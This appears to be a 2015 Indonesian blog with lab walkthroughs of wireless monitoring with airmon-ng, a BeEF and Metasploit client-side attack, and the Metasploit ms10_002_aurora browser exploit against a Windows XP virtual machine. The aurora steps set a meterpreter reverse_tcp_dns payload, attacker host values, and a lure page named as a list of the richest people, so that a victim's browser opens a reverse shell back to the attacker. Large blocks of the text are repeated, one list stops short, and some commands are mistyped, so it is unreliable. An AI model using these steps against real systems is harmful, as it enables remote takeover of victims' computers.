1. jalankan perintah airmon-ng untuk mengetahui wireless yang kita gunakan
2. jalankan perintah airmon-ng start wlan0 dimana saya menggunakan wlan0 untuk membaca peredaran wireless disekitar laptop saya
3. buka terminal baru dan cek ip adreesnya dan lihat maka akan tampil ip mon
4.
2. jalankan perintah airmon-ng start wlan0 dimana saya menggunakan wlan0 untuk membaca peredaran wireless disekitar laptop saya
3. buka terminal baru dan cek ip adreesnya dan lihat maka akan tampil ip mon
4.
Jumat, 28 Agustus 2015
some commands that can be executed through meterpreter, also maintains contact with the target
1. Open the beef through the terminal with the command beer-xss
2. it will open iceweasel by itself and will ask login password and password beef with beef
3. Open a new tab in the terminal and enable apache 2
4. Open a new tab in the terminal and activate exploit
5. create a command in the terminal exploit to attack meterpreter through client service
6. Open windows xp which is in virtualbox
7. run the exploit
8. Open Internet Explorer and go to a web address index.html
9. open on the icebrowser and we have to connect to the target web server
10. of beef we exploit the target to visit a web address that we provide to meterpreter targets.
11. Then, enter -l command session to view the sessions that have been connected with the target
12. The session then type the command -i 1 when the target is connected to session 1
13. then the target has been connected with us through meterpreter
2. it will open iceweasel by itself and will ask login password and password beef with beef
3. Open a new tab in the terminal and enable apache 2
4. Open a new tab in the terminal and activate exploit
5. create a command in the terminal exploit to attack meterpreter through client service
6. Open windows xp which is in virtualbox
7. run the exploit
8. Open Internet Explorer and go to a web address index.html
9. open on the icebrowser and we have to connect to the target web server
10. of beef we exploit the target to visit a web address that we provide to meterpreter targets.
11. Then, enter -l command session to view the sessions that have been connected with the target
12. The session then type the command -i 1 when the target is connected to session 1
13. then the target has been connected with us through meterpreter
EXPLOIT WITH CLIENT ATTACK AND BEEF
1. Open the beef through the terminal with the command beer-xss
2. it will open iceweasel by itself and will ask login password and password beef with beef
3. Open a new tab in the terminal and enable apache 2
4. Open a new tab in the terminal and activate exploit
5. create a command in the terminal exploit to attack meterpreter through client service
6. Open windows xp which is in virtualbox
7. run the exploit
8. Open Internet Explorer and go to a web address index.html
9. open on the icebrowser and we have to connect to the target web server
10. of beef we exploit the target to visit a web address that we provide to meterpreter targets.
11. Then, enter -l command session to view the sessions that have been connected with the target
12. The session then type the command -i 1 when the target is connected to session 1
13. then the target has been connected with us through meterpreter
2. it will open iceweasel by itself and will ask login password and password beef with beef
3. Open a new tab in the terminal and enable apache 2
4. Open a new tab in the terminal and activate exploit
5. create a command in the terminal exploit to attack meterpreter through client service
6. Open windows xp which is in virtualbox
7. run the exploit
8. Open Internet Explorer and go to a web address index.html
9. open on the icebrowser and we have to connect to the target web server
10. of beef we exploit the target to visit a web address that we provide to meterpreter targets.
11. Then, enter -l command session to view the sessions that have been connected with the target
12. The session then type the command -i 1 when the target is connected to session 1
13. then the target has been connected with us through meterpreter
Kamis, 27 Agustus 2015
Client Server Attack
2. to exploit in Windows via the browser type command use exploit / windows / browser / ms10_002_aurora on terminal exploit

3. type the command show option to determine what fields will be filled

4. set SRVHOST with us here I use the ip ip 192.168.56.1 so I would type on the terminal set SRVHOST 192.168.56.1
5. URIPATH set the path name that we want, here I use the path of the richest people in 2015 so I would type on the terminal set URIPATH orang_paling_kaya_tahun_2015.html
6. The next step in order to adjust the payload that gives a chance after the target enter the web address into the browser to directly connect to us that by typing in the terminal exploit is set payload windows / meterpreter / reverse_tcp_dns
7. set LHOST with us here I use the ip ip 192.168.56.1 so I would type on the terminal set LHOST 192.168.56.1
8. because we likened to a virtual box is the target, then we open the windows xp virtual box that is in us
9. open internet explorer
10. execute the exploit through the terminal
11. enter the address shown on the terminal into the web address lookup
12. to know we're connected with windows xp can directly typing sessions -l in terminal





































Tidak ada komentar:
Posting Komentar